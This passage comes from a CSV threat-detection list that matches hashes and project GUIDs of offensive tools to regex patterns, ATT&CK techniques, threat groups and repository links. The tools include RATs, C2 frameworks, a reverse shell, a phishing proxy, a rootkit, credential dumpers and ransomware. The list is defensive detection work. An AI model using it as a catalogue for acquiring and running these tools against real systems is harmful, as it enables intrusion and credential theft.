Movement","https://github.com/C-Sto/goWMIExec","1","0","#filehash","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","27447" "*5cdec4449506fe06e507619c8f1a66d890d96bb2ea30f6ea37f997853a52b243*",".{0,1000}5cdec4449506fe06e507619c8f1a66d890d96bb2ea30f6ea37f997853a52b243.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/nccgroup/SCOMDecrypt","1","0","#filehash","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","27448" "*5ce161bd3a1804cb6265d0d79615bcf9dc3b115ffe85011638de46e4b16c68dc*",".{0,1000}5ce161bd3a1804cb6265d0d79615bcf9dc3b115ffe85011638de46e4b16c68dc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27449" "*5ce31dbbcce69be63eaddd6759ea115162e96500f9ee185b106eb47c5c1417ce*",".{0,1000}5ce31dbbcce69be63eaddd6759ea115162e96500f9ee185b106eb47c5c1417ce.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","27450" "*5cee697909834727bc7a7531b6e32defd302d40a7643fda5ff9877e24e60d4bf*",".{0,1000}5cee697909834727bc7a7531b6e32defd302d40a7643fda5ff9877e24e60d4bf.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","27452" "*5CF031648822442C641F601094E922898DFA3D93C8D0B3E44FBCE22F43E7E402*",".{0,1000}5CF031648822442C641F601094E922898DFA3D93C8D0B3E44FBCE22F43E7E402.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27453" "*5cf784da346a55c15259f755ffc19790a90cd616449a47bb9617cf93bfe91441*",".{0,1000}5cf784da346a55c15259f755ffc19790a90cd616449a47bb9617cf93bfe91441.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","27455" "*5cf800056e1db3399b0f3dd19eed7c0ae2c187816c2a0e0da36191154726fb38*",".{0,1000}5cf800056e1db3399b0f3dd19eed7c0ae2c187816c2a0e0da36191154726fb38.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","27456" "*5cfbfbbb44fe784e5501694e37afd9df87e8d7f7bdc48a5de347e7b33bdba94e*",".{0,1000}5cfbfbbb44fe784e5501694e37afd9df87e8d7f7bdc48a5de347e7b33bdba94e.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","27457" "*5cfed16ae88f9a36880352f6490b9c417c8d46744a606e453eabf813f26f1239*",".{0,1000}5cfed16ae88f9a36880352f6490b9c417c8d46744a606e453eabf813f26f1239.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27458" "*5D01A326-0357-4C3F-A196-3B8B866C9613*",".{0,1000}5D01A326\-0357\-4C3F\-A196\-3B8B866C9613.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","27459" "*5d03288b02fce093ba94dd2933cfbaccdaa378bb8c38e64d14956dfb7601928c*",".{0,1000}5d03288b02fce093ba94dd2933cfbaccdaa378bb8c38e64d14956dfb7601928c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27460" "*5D03EFC2-72E9-4410-B147-0A1A5C743999*",".{0,1000}5D03EFC2\-72E9\-4410\-B147\-0A1A5C743999.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","#GUIDproject","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","27461" 
"*5d05813d5d30a6660ff8c5a0f62e82c8843f20e07789001a9bb9cfc4b09e9649*",".{0,1000}5d05813d5d30a6660ff8c5a0f62e82c8843f20e07789001a9bb9cfc4b09e9649.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","27462" "*5d08513f61d4172dee626b3287b4f6a9f8eece9fa1a8bfcfc11e85fb9b3d3bff*",".{0,1000}5d08513f61d4172dee626b3287b4f6a9f8eece9fa1a8bfcfc11e85fb9b3d3bff.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","27463" "*5D10ED0A-6C52-49FE-90F5-CFAAECA8FABE*",".{0,1000}5D10ED0A\-6C52\-49FE\-90F5\-CFAAECA8FABE.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","27465" "*5d16081315e1588a26019bb5195f2f72f278a3c86acf8cc1c072b791960beabf*",".{0,1000}5d16081315e1588a26019bb5195f2f72f278a3c86acf8cc1c072b791960beabf.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically 
brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","27466" "*5d17e9dd54752bf9071caeccace27123897fe33de26db8c6f3e544abd11f7cb2*",".{0,1000}5d17e9dd54752bf9071caeccace27123897fe33de26db8c6f3e544abd11f7cb2.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A","27467" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27471" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27472" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - 
TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27473" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27474" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27475" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27476" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27477" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - 
TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27478" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27479" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27480" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27481" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27482" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - 
TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27483" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27484" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27485" "*5D21B8F0-3824-4D15-9911-1E51F2416BC2*",".{0,1000}5D21B8F0\-3824\-4D15\-9911\-1E51F2416BC2.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27486" "*5d28c6c9ac74ea6b7ac401d75886e304a858f62efba888b825fea94e4660d4f2*",".{0,1000}5d28c6c9ac74ea6b7ac401d75886e304a858f62efba888b825fea94e4660d4f2.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","27488" "*5d2e0f4adc5e3bb1f154c9f22eee2cf15e0bb2c5815653e3d97cb1e97c99c326*",".{0,1000}5d2e0f4adc5e3bb1f154c9f22eee2cf15e0bb2c5815653e3d97cb1e97c99c326.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","#filehash","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","27489" "*5d34161be5f0c623d9810e39c594ee72f65ca74b9730f57ad6675c13d81e6d3f*",".{0,1000}5d34161be5f0c623d9810e39c594ee72f65ca74b9730f57ad6675c13d81e6d3f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27491" "*5D3EF551-3D1F-468E-A75B-764F436D577D*",".{0,1000}5D3EF551\-3D1F\-468E\-A75B\-764F436D577D.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#GUIDproject","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","27492" "*5d3f3909639924fe921e0ff58be252bd671db7d2c2c0cf56d301f4ea48548306*",".{0,1000}5d3f3909639924fe921e0ff58be252bd671db7d2c2c0cf56d301f4ea48548306.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","27493" "*5d43bbdef3c107cf95891b56c5b40febf853f0aca57991492a4025032a8fa050*",".{0,1000}5d43bbdef3c107cf95891b56c5b40febf853f0aca57991492a4025032a8fa050.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","27494" "*5d447208b1a06d45b5563f56da869e3c6ffa8e67247809798d24065d719160e8*",".{0,1000}5d447208b1a06d45b5563f56da869e3c6ffa8e67247809798d24065d719160e8.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27495" "*5D48347779833123E9FCCBCDC58ECE0FC301F05BCA0EDAFD34DE4F2693DC5E59*",".{0,1000}5D48347779833123E9FCCBCDC58ECE0FC301F05BCA0EDAFD34DE4F2693DC5E59.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27496" "*5d494fc79356aeb1e983aab7188e729550c1f54ffcdcb02270acc492f2164afa*",".{0,1000}5d494fc79356aeb1e983aab7188e729550c1f54ffcdcb02270acc492f2164afa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27497" "*5d4d311ed2ab95bbd9698cbd26c83ce62ee9a665c462ef9f6fcee2406ab795c4*",".{0,1000}5d4d311ed2ab95bbd9698cbd26c83ce62ee9a665c462ef9f6fcee2406ab795c4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27498" "*5D4E7C1F-4812-4038-9663-6CD277ED9AD4*",".{0,1000}5D4E7C1F\-4812\-4038\-9663\-6CD277ED9AD4.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","#GUIDproject","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","27499" "*5d593ef77ff46bf12da1f807f85c0971ffb44916c275a12829b5fcb4b95dfe05*",".{0,1000}5d593ef77ff46bf12da1f807f85c0971ffb44916c275a12829b5fcb4b95dfe05.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27500" "*5d61397acd2c3b39da7f48673ce25690db669c68d538487cdf79ecc8b56f039d*",".{0,1000}5d61397acd2c3b39da7f48673ce25690db669c68d538487cdf79ecc8b56f039d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27501" "*5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf*",".{0,1000}5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","27502" "*5d6beae72888b5b7c4d4d6bcef2c37256c736435fd1b08ff642ee4c60a310ea5*",".{0,1000}5d6beae72888b5b7c4d4d6bcef2c37256c736435fd1b08ff642ee4c60a310ea5.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27503" "*5d718f2a4cb244409b90df00bca8dd43b57e5892743f203f0f382eb863b1d8f4*",".{0,1000}5d718f2a4cb244409b90df00bca8dd43b57e5892743f203f0f382eb863b1d8f4.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","27504" "*5d7d828bad9b38218b3eee49222c7759318cf7156d8a90aa94022468897b14e8*",".{0,1000}5d7d828bad9b38218b3eee49222c7759318cf7156d8a90aa94022468897b14e8.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27505" "*5d80699a96aa3f8d7530f5dc55c4719b2470171539fcd957a6940811b18d5e1c*",".{0,1000}5d80699a96aa3f8d7530f5dc55c4719b2470171539fcd957a6940811b18d5e1c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27506" "*5d848352fb3ae2109dd1ee927717c8c004f2e07f33b14d7fd25dba71784f5579*",".{0,1000}5d848352fb3ae2109dd1ee927717c8c004f2e07f33b14d7fd25dba71784f5579.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session 
